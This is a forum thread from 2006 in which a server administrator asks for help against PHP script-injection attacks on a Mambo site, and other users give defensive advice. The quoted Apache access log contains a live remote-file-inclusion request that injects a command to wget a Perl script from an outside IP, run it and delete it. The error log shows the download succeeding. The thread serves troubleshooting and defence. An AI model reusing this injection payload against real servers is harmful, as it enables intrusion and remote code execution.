php script injections

[Grizzly]

server being attacked by script injections I have already chmod wget but attacks still continue and seem to be getting more advanced need help securing the server

extract from logfile /var/log/apache2/access_log

82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"

extract from logfile /var/log/apache2/error_log

[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
--22:20:55-- http://66.90.88.178/mambo.txt
=> `mambo.txt'
Connecting to 66.90.88.178:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,282 (16K) [text/plain]

0K .......... ..... 100% 7.77 KB/s

22:20:58 (7.77 KB/s) - `mambo.txt' saved [16282/16282]

kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec]
[Sat Jul 15 22:41:53 2006] [warn] child process 13552 still did not exit, sending a SIGTERM
[Sat Jul 15 22:41:53 2006] [warn] child process 30607 still did not exit, sending a SIGTERM


Need help advice anything...

Thank you in advance

[sjau]

you could deny the IP of the attacker in a .htaccess

[TheRudy]

Remove the script asap. Contact author of script and tell them about this if you haven't wrote it yourself. You might also check for updates.. Denying IP won't solve it cause he can use different server and voila, you get hacked again..

I would lock down the server untill its checked out.. Run chrootkit and rkhunter (not sure if they detect this script but it can't hurt running them..).. An antivirus scan can't hurt either..

Btw, mambo is VERY buggy application. Would suggest you to switch to joomla if you want the same interface and stuff.. I think you can even upgrade from mambo to joomla..

[edge]

http://66.90.88.178/mambo.txt is allready giving me a virus warning!

I like the "main" site :-)

[TheRudy]

Quote:

Originally Posted by edge

http://66.90.88.178/mambo.txt is allready giving me a virus warning!

I like the "main" site :-)

You also checked that eh?

[Grizzly]

I cant seem to find the script on my server I've installed rkhunter and updated + scanned the system. found nothing

66.90.88.178 is not my site its just that my server is being told the get these scripts from various sites including the one mentioned and then running them when i check my running proccesses I find alot of https instances which dont make any sense to me I've tried looking for help on installing modsecurity on my suse 10 server, but had no luck. not to sure if its safe to install when running ispconfig with suse 10 using the perfect setup from howtoforge.

I have also updated o the latest patches from suse. these scripts are alos being run on domains that I have since made dormant with nothing in the actual /var/www/web#/web folder when i check my logs even they are being used to download these scripts which is strange since before ispconfig was installed I chmod 700 wget.